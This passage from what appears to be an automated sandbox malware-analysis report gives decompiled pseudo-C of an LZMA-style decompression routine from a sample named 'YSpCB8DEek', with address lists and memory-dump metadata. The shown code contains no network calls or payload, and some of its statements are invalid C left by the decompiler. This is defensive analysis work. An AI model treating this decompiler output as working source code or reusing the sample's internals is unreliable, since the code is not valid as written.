                            												_t192 = __eax %  *(__ebp - 0x74);
                            												__eax = __eax /  *(__ebp - 0x74);
                            												__edx = _t192;
                            												goto L80;
                            											case 0x1b:
                            												L76:
                            												__eflags =  *(__ebp - 0x64);
                            												if( *(__ebp - 0x64) == 0) {
                            													 *(__ebp - 0x88) = 0x1b;
                            													goto L170;
                            												}
                            												__eax =  *(__ebp - 0x14);
                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            												__eflags = __eax -  *(__ebp - 0x74);
                            												if(__eax >=  *(__ebp - 0x74)) {
                            													__eax = __eax +  *(__ebp - 0x74);
                            													__eflags = __eax;
                            												}
                            												__edx =  *(__ebp - 8);
                            												__cl =  *(__eax + __edx);
                            												__eax =  *(__ebp - 0x14);
                            												 *(__ebp - 0x5c) = __cl;
                            												 *(__eax + __edx) = __cl;
                            												__eax = __eax + 1;
                            												__edx = 0;
                            												_t275 = __eax %  *(__ebp - 0x74);
                            												__eax = __eax /  *(__ebp - 0x74);
                            												__edx = _t275;
                            												__eax =  *(__ebp - 0x68);
                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            												_t284 = __ebp - 0x64;
                            												 *_t284 =  *(__ebp - 0x64) - 1;
                            												__eflags =  *_t284;
                            												 *( *(__ebp - 0x68)) = __cl;
                            												L80:
                            												 *(__ebp - 0x14) = __edx;
                            												goto L81;
                            											case 0x1c:
                            												while(1) {
                            													L123:
                            													__eflags =  *(__ebp - 0x64);
                            													if( *(__ebp - 0x64) == 0) {
                            														break;
                            													}
                            													__eax =  *(__ebp - 0x14);
                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            													__eflags = __eax -  *(__ebp - 0x74);
                            													if(__eax >=  *(__ebp - 0x74)) {
                            														__eax = __eax +  *(__ebp - 0x74);
                            														__eflags = __eax;
                            													}
                            													__edx =  *(__ebp - 8);
                            													__cl =  *(__eax + __edx);
                            													__eax =  *(__ebp - 0x14);
                            													 *(__ebp - 0x5c) = __cl;
                            													 *(__eax + __edx) = __cl;
                            													__eax = __eax + 1;
                            													__edx = 0;
                            													_t414 = __eax %  *(__ebp - 0x74);
                            													__eax = __eax /  *(__ebp - 0x74);
                            													__edx = _t414;
                            													__eax =  *(__ebp - 0x68);
                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            													__eflags =  *(__ebp - 0x30);
                            													 *( *(__ebp - 0x68)) = __cl;
                            													 *(__ebp - 0x14) = _t414;
                            													if( *(__ebp - 0x30) > 0) {
                            														continue;
                            													} else {
                            														L81:
                            														 *(__ebp - 0x88) = 2;
                            														goto L1;
                            													}
                            												}
                            												 *(__ebp - 0x88) = 0x1c;
                            												goto L170;
                            										}
                            									}
                            									L171:
                            									_t535 = _t534 | 0xffffffff;
                            									goto L172;
                            								}
                            							}
                            						}
                            					}
                            					goto L1;
                            				}
                            			}













                            0x00407543
                            0x00407546
                            0x00407447
                            0x00000000
                            0x00000000
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00407194
                            0x00407197
                            0x0040719a
                            0x0040719c
                            0x0040719e
                            0x0040719e
                            0x0040719f
                            0x004071a2
                            0x004071a9
                            0x004071ac
                            0x004071ba
                            0x00000000
                            0x00000000
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x00000000
                            0x00000000
                            0x0040749f
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x00000000
                            0x004075db
                            0x004074a9
                            0x004074ac
                            0x004074af
                            0x004074b3
                            0x004074b6
                            0x004074bc
                            0x004074be
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c7
                            0x004074c7
                            0x004074cb
                            0x0040752b
                            0x0040752e
                            0x00407533
                            0x00407534
                            0x00407536
                            0x00407538
                            0x0040753b
                            0x00407447
                            0x00407447
                            0x00000000
                            0x0040744d
                            0x00407447
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074eb
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x0040751d
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00000000
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00407447
                            0x004073ce
                            0x004073cb
                            0x00000000
                            0x00407120

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                            • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                            • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                            • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 98%
                            			E00407068() {
                            				unsigned short _t531;
                            				signed int _t532;
                            				void _t533;
                            				signed int _t534;
                            				signed int _t535;
                            				signed int _t565;
                            				signed int _t568;
                            				signed int _t589;
                            				signed int* _t606;
                            				void* _t613;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					if( *(_t613 - 0x40) != 0) {
                            						 *(_t613 - 0x84) = 0xa;
                            						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                            					} else {
                            						 *(__ebp - 0x84) = 9;
                            						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                            					}
                            					while(1) {
                            						 *(_t613 - 0x54) = _t606;
                            						while(1) {
                            							L133:
                            							_t531 =  *_t606;
                            							_t589 = _t531 & 0x0000ffff;
                            							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                            							if( *(_t613 - 0xc) >= _t565) {
                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                            								 *(_t613 - 0x40) = 1;
                            								_t532 = _t531 - (_t531 >> 5);
                            								 *_t606 = _t532;
                            							} else {
                            								 *(_t613 - 0x10) = _t565;
                            								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                            								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                            							}
                            							if( *(_t613 - 0x10) >= 0x1000000) {
                            								goto L139;
                            							}
                            							L137:
                            							if( *(_t613 - 0x6c) == 0) {
                            								 *(_t613 - 0x88) = 5;
                            								L170:
                            								_t568 = 0x22;
                            								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                            								_t535 = 0;
                            								L172:
                            								return _t535;
                            							}
                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                            							L139:
                            							_t533 =  *(_t613 - 0x84);
                            							while(1) {
                            								 *(_t613 - 0x88) = _t533;
                            								while(1) {
                            									L1:
                            									_t534 =  *(_t613 - 0x88);
                            									if(_t534 > 0x1c) {
                            										break;
                            									}
                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                            										case 0:
                            											if( *(_t613 - 0x6c) == 0) {
                            												goto L170;
                            											}
                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                            											_t534 =  *( *(_t613 - 0x70));
                            											if(_t534 > 0xe1) {
                            												goto L171;
                            											}
                            											_t538 = _t534 & 0x000000ff;
                            											_push(0x2d);
                            											asm("cdq");
                            											_pop(_t570);
                            											_push(9);
                            											_pop(_t571);
                            											_t609 = _t538 / _t570;
                            											_t540 = _t538 % _t570 & 0x000000ff;
                            											asm("cdq");
                            											_t604 = _t540 % _t571 & 0x000000ff;
                            											 *(_t613 - 0x3c) = _t604;
                            											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                            											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                            											_t612 = (0x300 << _t604 + _t609) + 0x736;
                            											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                            												L10:
                            												if(_t612 == 0) {
                            													L12:
                            													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                            													goto L15;
                            												} else {
                            													goto L11;
                            												}
                            												do {
                            													L11:
                            													_t612 = _t612 - 1;
                            													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                            												} while (_t612 != 0);
                            												goto L12;
                            											}
                            											if( *(_t613 - 4) != 0) {
                            												GlobalFree( *(_t613 - 4));
                            											}
                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                            											 *(_t613 - 4) = _t534;
                            											if(_t534 == 0) {
                            												goto L171;
                            											} else {
                            												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                            												goto L10;
                            											}
                            										case 1:
                            											L13:
                            											__eflags =  *(_t613 - 0x6c);
                            											if( *(_t613 - 0x6c) == 0) {
                            												 *(_t613 - 0x88) = 1;
                            												goto L170;
                            											}
                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                            											_t45 = _t613 - 0x48;
                            											 *_t45 =  *(_t613 - 0x48) + 1;
                            											__eflags =  *_t45;
                            											L15:
                            											if( *(_t613 - 0x48) < 4) {
                            												goto L13;
                            											}
                            											_t546 =  *(_t613 - 0x40);
                            											if(_t546 ==  *(_t613 - 0x74)) {
                            												L20:
                            												 *(_t613 - 0x48) = 5;
                            												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                            												goto L23;
                            											}
                            											 *(_t613 - 0x74) = _t546;
                            											if( *(_t613 - 8) != 0) {
                            												GlobalFree( *(_t613 - 8));
                            											}
                            											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                            											 *(_t613 - 8) = _t534;
                            											if(_t534 == 0) {
                            												goto L171;
                            											} else {
                            												goto L20;
                            											}
                            										case 2:
                            											L24:
                            											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                            											 *(_t613 - 0x84) = 6;
                            											 *(_t613 - 0x4c) = _t553;
                            											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                            											 *(_t613 - 0x54) = _t606;
                            											goto L133;
                            										case 3:
                            											L21:
                            											__eflags =  *(_t613 - 0x6c);
                            											if( *(_t613 - 0x6c) == 0) {
                            												 *(_t613 - 0x88) = 3;
                            												goto L170;
                            											}
                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                            											_t67 = _t613 - 0x70;
                            											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                            											__eflags =  *_t67;
                            											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                            											L23:
                            											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                            											if( *(_t613 - 0x48) != 0) {
                            												goto L21;
                            											}
                            											goto L24;
                            										case 4:
                            											L133:
                            											_t531 =  *_t606;
                            											_t589 = _t531 & 0x0000ffff;
                            											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                            											if( *(_t613 - 0xc) >= _t565) {
                            												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                            												 *(_t613 - 0x40) = 1;
                            												_t532 = _t531 - (_t531 >> 5);
                            												 *_t606 = _t532;
                            											} else {
                            												 *(_t613 - 0x10) = _t565;
                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                            												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                            											}
                            											if( *(_t613 - 0x10) >= 0x1000000) {
                            												goto L139;
                            											}
                            										case 5:
                            											goto L137;
                            										case 6:
                            											__edx = 0;
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												__eax =  *(__ebp - 4);
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x34) = 1;
                            												 *(__ebp - 0x84) = 7;
                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                            												while(1) {
                            													 *(_t613 - 0x54) = _t606;
                            													goto L133;
                            												}
                            											}
                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                            											__esi =  *(__ebp - 0x60);
                            											__cl = 8;
                            											__cl = 8 -  *(__ebp - 0x3c);
                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                            											__ecx =  *(__ebp - 0x3c);
                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                            											__ecx =  *(__ebp - 4);
                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                            											__eflags =  *(__ebp - 0x38) - 4;
                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            											if( *(__ebp - 0x38) >= 4) {
                            												__eflags =  *(__ebp - 0x38) - 0xa;
                            												if( *(__ebp - 0x38) >= 0xa) {
                            													_t98 = __ebp - 0x38;
                            													 *_t98 =  *(__ebp - 0x38) - 6;
                            													__eflags =  *_t98;
                            												} else {
                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                            												}
                            											} else {
                            												 *(__ebp - 0x38) = 0;
                            											}
                            											__eflags =  *(__ebp - 0x34) - __edx;
                            											if( *(__ebp - 0x34) == __edx) {
                            												__ebx = 0;
                            												__ebx = 1;
                            												goto L61;
                            											} else {
                            												__eax =  *(__ebp - 0x14);
                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            												__eflags = __eax -  *(__ebp - 0x74);
                            												if(__eax >=  *(__ebp - 0x74)) {
                            													__eax = __eax +  *(__ebp - 0x74);
                            													__eflags = __eax;
                            												}
                            												__ecx =  *(__ebp - 8);
                            												__ebx = 0;
                            												__ebx = 1;
                            												__al =  *((intOrPtr*)(__eax + __ecx));
                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                            												goto L41;
                            											}
                            										case 7:
                            											__eflags =  *(__ebp - 0x40) - 1;
                            											if( *(__ebp - 0x40) != 1) {
                            												__eax =  *(__ebp - 0x24);
                            												 *(__ebp - 0x80) = 0x16;
                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            												__eax =  *(__ebp - 0x28);
                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            												__eax =  *(__ebp - 0x2c);
                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            												__eax = 0;
                            												__eflags =  *(__ebp - 0x38) - 7;
                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            												__al = __al & 0x000000fd;
                            												__eax = (__eflags >= 0) - 1 + 0xa;
                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                            												__eax =  *(__ebp - 4);
                            												__eax =  *(__ebp - 4) + 0x664;
                            												__eflags = __eax;
                            												 *(__ebp - 0x58) = __eax;
                            												goto L69;
                            											}
                            											__eax =  *(__ebp - 4);
                            											__ecx =  *(__ebp - 0x38);
                            											 *(__ebp - 0x84) = 8;
                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                            											while(1) {
                            												 *(_t613 - 0x54) = _t606;
                            												goto L133;
                            											}
                            										case 8:
                            											goto L0;
                            										case 9:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												goto L89;
                            											}
                            											__eflags =  *(__ebp - 0x60);
                            											if( *(__ebp - 0x60) == 0) {
                            												goto L171;
                            											}
                            											__eax = 0;
                            											__eflags =  *(__ebp - 0x38) - 7;
                            											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                            											__eflags = _t258;
                            											0 | _t258 = _t258 + _t258 + 9;
                            											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                            											goto L75;
                            										case 0xa:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												__eax =  *(__ebp - 4);
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x84) = 0xb;
                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                            												while(1) {
                            													 *(_t613 - 0x54) = _t606;
                            													goto L133;
                            												}
                            											}
                            											__eax =  *(__ebp - 0x28);
                            											goto L88;
                            										case 0xb:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												__ecx =  *(__ebp - 0x24);
                            												__eax =  *(__ebp - 0x20);
                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            											} else {
                            												__eax =  *(__ebp - 0x24);
                            											}
                            											__ecx =  *(__ebp - 0x28);
                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            											L88:
                            											__ecx =  *(__ebp - 0x2c);
                            											 *(__ebp - 0x2c) = __eax;
                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            											L89:
                            											__eax =  *(__ebp - 4);
                            											 *(__ebp - 0x80) = 0x15;
                            											__eax =  *(__ebp - 4) + 0xa68;
                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                            											goto L69;
                            										case 0xc:
                            											L99:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0xc;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t334 = __ebp - 0x70;
                            											 *_t334 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t334;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											__eax =  *(__ebp - 0x2c);
                            											goto L101;
                            										case 0xd:
                            											L37:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0xd;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t122 = __ebp - 0x70;
                            											 *_t122 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t122;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											L39:
                            											__eax =  *(__ebp - 0x40);
                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                            												goto L48;
                            											}
                            											__eflags = __ebx - 0x100;
                            											if(__ebx >= 0x100) {
                            												goto L54;
                            											}
                            											L41:
                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                            											__ecx =  *(__ebp - 0x58);
                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                            											 *(__ebp - 0x48) = __eax;
                            											__eax = __eax + 1;
                            											__eax = __eax << 8;
                            											__eax = __eax + __ebx;
                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            											__ax =  *__esi;
                            											 *(__ebp - 0x54) = __esi;
                            											__edx = __ax & 0x0000ffff;
                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                            											__eflags =  *(__ebp - 0xc) - __ecx;
                            											if( *(__ebp - 0xc) >= __ecx) {
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            												__cx = __ax;
                            												 *(__ebp - 0x40) = 1;
                            												__cx = __ax >> 5;
                            												__eflags = __eax;
                            												__ebx = __ebx + __ebx + 1;
                            												 *__esi = __ax;
                            											} else {
                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                            												 *(__ebp - 0x10) = __ecx;
                            												0x800 = 0x800 - __edx;
                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                            												__ebx = __ebx + __ebx;
                            												 *__esi = __cx;
                            											}
                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                            											 *(__ebp - 0x44) = __ebx;
                            											if( *(__ebp - 0x10) >= 0x1000000) {
                            												goto L39;
                            											} else {
                            												goto L37;
                            											}
                            										case 0xe:
                            											L46:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0xe;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t156 = __ebp - 0x70;
                            											 *_t156 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t156;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											while(1) {
                            												L48:
                            												__eflags = __ebx - 0x100;
